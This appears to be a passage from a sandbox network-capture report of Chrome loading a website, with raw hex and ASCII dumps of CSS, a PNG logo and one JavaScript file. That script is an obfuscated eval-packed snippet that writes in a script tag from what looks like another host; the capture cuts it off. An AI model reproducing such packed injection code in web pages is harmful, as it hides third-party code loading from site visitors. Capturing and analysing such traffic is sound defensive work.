                                                        Data Ascii: n-bottom: 50px; } .faq-img { margin-top: 50px; } .appnox-pricing-area { padding: 0 0 20px 0; } .appnox-videos-area { margin: 50px 0; } .videos-icon-text h3 { font-size: 40
                                                        2025-03-15 00:17:55 UTC1369INData Raw: 62 6c 6f 67 2d 61 72 65 61 20 7b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 30 70 78 20 30 20 30 20 30 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 61 70 70 6e 6f 78 2d 6c 61 74 65 73 74 2d 62 6c 6f 67 2d 61 72 65 61 20 2e 70 72 2d 34 35 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 61 70 70 6e 6f 78 2d 70 61 67 69 6e 61 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 33 30 70 78 20 31 35 70 78 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 6c 6f 67 2d 64 65 74 61 69 6c 73 2d 63 6f 6e 74 65 6e 74 20 68 33 20 7b 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 70 78 3b 0d 0a 20
                                                        Data Ascii: blog-area { margin: 50px 0 0 0; } .appnox-latest-blog-area .pr-45 { padding-right: 15px; } .appnox-pagination { margin: 0 0 30px 15px; } .blog-details-content h3 { font-size: 25px;
                                                        2025-03-15 00:17:55 UTC1369INData Raw: 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 68 65 72 6f 2d 63 6f 6e 74 65 6e 74 20 70 20 7b 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 73 65 61 72 63 68 2d 66 6f 72 6d 2d 63 65 6e 74 65 72 65 64 20 7b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 30 25 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 68 65 61 64 65 72 2d 61 72 65 61 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 20 30 20
                                                        Data Ascii: font-size: 35px; margin-bottom: 15px; } .hero-content p { font-size: 16px; } .search-form-centered { width: 90%; } .header-area { text-align: center; padding: 20px 0
                                                        2025-03-15 00:17:55 UTC1369INData Raw: 64 64 69 6e 67 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 61 70 70 6e 6f 78 2d 76 69 64 65 6f 73 2d 61 72 65 61 20 7b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 30 70 78 20 30 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 76 69 64 65 6f 73 2d 69 63 6f 6e 2d 74 65 78 74 20 68 33 20 7b 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 76 69 64 65 6f 73 2d 69 63 6f 6e 2d 74 65 78 74 20 69 20 7b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 30 30 70 78 3b 0d
                                                        Data Ascii: dding: 0 0 20px 0; } .appnox-videos-area { margin: 50px 0; } .videos-icon-text h3 { font-size: 40px; } .videos-icon-text i { height: 100px; width: 100px; line-height: 100px;
                                                        2025-03-15 00:17:55 UTC1162INData Raw: 78 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 6c 6f 67 2d 74 69 74 6c 65 20 68 33 20 61 20 7b 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 61 70 70 6e 6f 78 2d 70 61 67 69 6e 61 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 33 30 70 78 20 31 35 70 78 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 33 39 70 78 20 32 30 70 78 20 34 30 70 78 20 36 35 70 78 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 6c 6f 63 6b 2d 71
                                                        Data Ascii: x; } .blog-title h3 a { font-size: 20px; line-height: 1 !important; } .appnox-pagination { margin: 0 0 30px 15px; } .block-quote { padding: 39px 20px 40px 65px; } .block-q


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.549747104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:55 UTC601OUTGET /dgij3ogsjf2ffwg.js HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:55 UTC992INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:55 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 362
                                                        Connection: close
                                                        last-modified: Tue, 27 Aug 2024 03:57:13 GMT
                                                        etag: "66cd4e99-16a"
                                                        expires: Sat, 15 Mar 2025 04:16:24 GMT
                                                        Cache-Control: max-age=43200
                                                        strict-transport-security: max-age=31536000
                                                        CF-Cache-Status: HIT
                                                        Age: 28896
                                                        Accept-Ranges: bytes
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CPuXQZDoZOhJ7h6clwfZ7CT6QwXZO1DN5uuXljG6Vh%2BPJFAN5P4BuxbnoULH2FQzl6LZ%2BVGkvKlVpocBuFAa5UVTH%2FDMwAfE1RBfitA0j4c9EpfDWZ%2Fh%2Fc0aHCuYNIk%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4a0db7a42cd-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1739&min_rtt=1733&rtt_var=662&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2815&recv_bytes=1173&delivery_rate=1637689&cwnd=180&unsent_bytes=0&cid=60e75b73f384ac4c&ts=252&x=0"
                                                        2025-03-15 00:17:55 UTC362INData Raw: 3b 65 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 70 2c 61 2c 63 2c 6b 2c 65 2c 72 29 7b 65 3d 53 74 72 69 6e 67 3b 69 66 28 21 27 27 2e 72 65 70 6c 61 63 65 28 2f 5e 2f 2c 53 74 72 69 6e 67 29 29 7b 77 68 69 6c 65 28 63 2d 2d 29 72 5b 63 5d 3d 6b 5b 63 5d 7c 7c 63 3b 6b 3d 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 72 5b 65 5d 7d 5d 3b 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 27 5c 5c 77 2b 27 7d 3b 63 3d 31 7d 3b 77 68 69 6c 65 28 63 2d 2d 29 69 66 28 6b 5b 63 5d 29 70 3d 70 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 27 5c 5c 62 27 2b 65 28 63 29 2b 27 5c 5c 62 27 2c 27 67 27 29 2c 6b 5b 63 5d 29 3b 72 65 74 75 72 6e 20 70 7d 28 27 31 2e 32 28 22 3c 30 20 33 3d 5c 5c 22 34 3a 2f 2f 35 2e 36 2e 37 2f 38 2e 39
                                                        Data Ascii: ;eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1.2("<0 3=\\"4://5.6.7/8.9


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.549748104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:55 UTC643OUTGET /static/css/b6f99a7fe7b04da897d26b4ff96c2310.css HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://www.36fg.com/static/css/style.css
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:56 UTC979INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:56 GMT
                                                        Content-Type: text/css
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:30 GMT
                                                        vary: Accept-Encoding
                                                        etag: W/"60e7ae72-267a"
                                                        expires: Sat, 15 Mar 2025 12:18:01 GMT
                                                        Cache-Control: max-age=43200
                                                        strict-transport-security: max-age=31536000
                                                        CF-Cache-Status: REVALIDATED
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xr0AqR1YiXsgp1FSNr4O%2BC1QWE5LYkVzQ%2B6lrB188Je5Sr8gOYcEmn2ugie04f5vR5LBb3G8ec0WQFbrbZqQqta1nhwhVK2PNiAQ3zJfPRii7ch0LcuSwF3aX2zZWSs%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4a3f92b4364-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1742&rtt_var=657&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1215&delivery_rate=1660978&cwnd=173&unsent_bytes=0&cid=2e064824ee552715&ts=348&x=0"
                                                        2025-03-15 00:17:56 UTC390INData Raw: 32 36 37 61 0d 0a ef bb bf 2f 2a 20 64 65 76 61 6e 61 67 61 72 69 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 6f 70 70 69 6e 73 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 70 78 69 67 79 70 38 6b 76 38 6a 68 67 66 76 72 6a 6a 6c 75 63 78 74 61 6b 70 79 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 39 30 30 2d 30 39 37 46 2c 20 55 2b 31 43 44 30 2d 31 43 46 36 2c 20 55 2b 31 43 46 38 2d 31 43 46 39
                                                        Data Ascii: 267a/* devanagari */@font-face { font-family: 'Poppins'; font-style: italic; font-weight: 400; font-display: swap; src: url(../fonts/pxigyp8kv8jhgfvrjjlucxtakpy.woff2) format('woff2'); unicode-range: U+0900-097F, U+1CD0-1CF6, U+1CF8-1CF9
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 20 69 74 61 6c 69 63 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 70 78 69 67 79 70 38 6b 76 38 6a 68 67 66 76 72 6a 6a 6c 75 66 6e 74 61 6b 70 79 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 34 46 2c 20 55 2b 30 32 35 39 2c 20 55 2b 31 45 30 30 2d 31 45 46 46 2c 20 55 2b 32 30 32 30 2c 20 55 2b 32 30 41 30 2d 32 30 41 42 2c 20 55 2b 32 30 41 44 2d 32 30 43 46 2c 20 55 2b 32 31 31 33 2c 20 55 2b 32 43 36 30 2d 32 43 37 46 2c 20 55 2b 41 37 32 30 2d 41 37 46 46 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 20 2a 2f
                                                        Data Ascii: italic; font-weight: 400; font-display: swap; src: url(../fonts/pxigyp8kv8jhgfvrjjlufntakpy.woff2) format('woff2'); unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 67 66 76 72 6a 6a 66 65 63 67 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 30 30 30 2d 30 30 46 46 2c 20 55 2b 30 31 33 31 2c 20 55 2b 30 31 35 32 2d 30 31 35 33 2c 20 55 2b 30 32 42 42 2d 30 32 42 43 2c 20 55 2b 30 32 43 36 2c 20 55 2b 30 32 44 41 2c 20 55 2b 30 32 44 43 2c 20 55 2b 32 30 30 30 2d 32 30 36 46 2c 20 55 2b 32 30 37 34 2c 20 55 2b 32 30 41 43 2c 20 55 2b 32 31 32 32 2c 20 55 2b 32 31 39 31 2c 20 55 2b 32 31 39 33 2c 20 55 2b 32 32 31 32 2c 20 55 2b 32 32 31 35 2c 20 55 2b 46 45 46 46 2c 20 55 2b 46 46 46 44 3b 0a 7d 0a 2f 2a 20 64 65 76 61 6e 61 67 61 72 69 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20
                                                        Data Ascii: gfvrjjfecg.woff2) format('woff2'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* devanagari */@font-face { font-family:
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 39 30 30 2d 30 39 37 46 2c 20 55 2b 31 43 44 30 2d 31 43 46 36 2c 20 55 2b 31 43 46 38 2d 31 43 46 39 2c 20 55 2b 32 30 30 43 2d 32 30 30 44 2c 20 55 2b 32 30 41 38 2c 20 55 2b 32 30 42 39 2c 20 55 2b 32 35 43 43 2c 20 55 2b 41 38 33 30 2d 41 38 33 39 2c 20 55 2b 41 38 45 30 2d 41 38 46 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 6f 70 70 69 6e 73 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a
                                                        Data Ascii: ff2) format('woff2'); unicode-range: U+0900-097F, U+1CD0-1CF6, U+1CF8-1CF9, U+200C-200D, U+20A8, U+20B9, U+25CC, U+A830-A839, U+A8E0-A8FB;}/* latin-ext */@font-face { font-family: 'Poppins'; font-style: normal; font-weight: 600; font-display:
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 45 46 46 2c 20 55 2b 32 30 32 30 2c 20 55 2b 32 30 41 30 2d 32 30 41 42 2c 20 55 2b 32 30 41 44 2d 32 30 43 46 2c 20 55 2b 32 31 31 33 2c 20 55 2b 32 43 36 30 2d 32 43 37 46 2c 20 55 2b 41 37 32 30 2d 41 37 46 46 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 6f 70 70 69 6e 73 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 70 78 69 62 79 70 38 6b 76 38 6a 68 67 66 76 72 6c 63 7a 37 7a 31 78 6c 66 71 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66
                                                        Data Ascii: EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face { font-family: 'Poppins'; font-style: normal; font-weight: 700; font-display: swap; src: url(../fonts/pxibyp8kv8jhgfvrlcz7z1xlfq.woff2) format('wof
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 33 37 30 2d 30 33 46 46 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 55 62 75 6e 74 75 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 34 69 63 73 36 6b 76 6a 62 6e 62 79 6c 67 6f 6b 63 71 37 32 6a 30 30 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 34 46 2c 20 55 2b 30 32 35 39 2c 20
                                                        Data Ascii: unicode-range: U+0370-03FF;}/* latin-ext */@font-face { font-family: 'Ubuntu'; font-style: normal; font-weight: 400; font-display: swap; src: url(../fonts/4ics6kvjbnbylgokcq72j00.woff2) format('woff2'); unicode-range: U+0100-024F, U+0259,
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 2f 34 69 63 76 36 6b 76 6a 62 6e 62 79 6c 67 6f 63 6a 63 33 6a 76 67 79 6e 6c 34 75 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 31 46 30 30 2d 31 46 46 46 3b 0a 7d 0a 2f 2a 20 67 72 65 65 6b 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 55 62 75 6e 74 75 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 34 69 63 76 36 6b 76 6a 62 6e 62 79 6c 67 6f 63 6a 63 33 6a 73 32 79 6e 6c 34 75 2e 77 6f 66 66 32 29 20 66
                                                        Data Ascii: /4icv6kvjbnbylgocjc3jvgynl4u.woff2) format('woff2'); unicode-range: U+1F00-1FFF;}/* greek */@font-face { font-family: 'Ubuntu'; font-style: normal; font-weight: 500; font-display: swap; src: url(../fonts/4icv6kvjbnbylgocjc3js2ynl4u.woff2) f
                                                        2025-03-15 00:17:56 UTC1254INData Raw: 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 34 69 63 76 36 6b 76 6a 62 6e 62 79 6c 67 6f 63 78 63 76 6a 74 67 79 6e 6c 34 75 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 30 30 2d 30 34 35 46 2c 20 55 2b 30 34 39 30 2d 30 34 39 31 2c 20 55 2b 30 34 42 30 2d 30 34 42 31 2c 20 55 2b 32 31 31 36 3b 0a 7d 0a 2f 2a 20 67 72 65 65 6b 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 55 62 75 6e 74 75 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20
                                                        Data Ascii: wap; src: url(../fonts/4icv6kvjbnbylgocxcvjtgynl4u.woff2) format('woff2'); unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* greek-ext */@font-face { font-family: 'Ubuntu'; font-style: normal; font-weight: 700; font-display:
                                                        2025-03-15 00:17:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.549749104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:55 UTC668OUTGET /static/picture/logo-1.png HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:55 UTC443INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:55 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 2889
                                                        Connection: close
                                                        Server: cloudflare
                                                        Accept-Ranges: bytes
                                                        Last-Modified: Fri, 09 Jul 2021 02:03:34 GMT
                                                        Etag: "60e7ae76-b49"
                                                        Expires: Sun, 13 Apr 2025 11:46:45 GMT
                                                        Cache-Control: max-age=2592000
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cf-Cache-Status: HIT
                                                        Age: 45076
                                                        CF-RAY: 9207d4a3fb490f88-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-15 00:17:55 UTC926INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 79 00 00 00 30 08 06 00 00 00 35 ad d5 ed 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 76 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                        Data Ascii: PNGIHDRy05tEXtSoftwareAdobe ImageReadyqe<viTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                        2025-03-15 00:17:55 UTC1369INData Raw: 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e e9 34 6f 48 00 00 07 69 49 44 41 54 78 da ec 5c 0b 88 54 55 18 3e ab eb 56 8a c5 48 4a f4 6e 08 7a 9a da 18 52 da 8a 36 46 54 6c 21 ad bd ac 20 c8 c9 ca 4a 48 76 09 0a 32 a8 dd a2 0c 94 6a a7 32 cb c8 72 28 ca a0 28 27 7b 48 a5 b4 a3 49 a1 3d dc 6d 2d 83 ec e1 b4 3d 4c 31 dd be bf fb 4f de 3d f3 9f fb 98 b9 3b 33 2b e7 83 8f 9d b9 f7 cc 3f e7 9e ef 9c ff fc ff 39 67 a7 ae af af 4f 59 84 c0 a9 f7 d7 4a 4d 46 81 57 80 d3 c1 09 e0 d1 e0 30 f0 07 f0 5d 70 11 b8 85 0a d6 5b d5 06 1d ce 06 5b c0 cb c0 43 84 fb 71 e6 f5 cc 95 56 e4 c1 83 33 c0 07 c1 4b c1 3a f0 47 f0 23 f0 7b f0 04 b0 09 1c ea 2a 4f 1d e0 39 70 a3 15 b9 f6 31 02 bc 17 9c 0f ee 07 5f
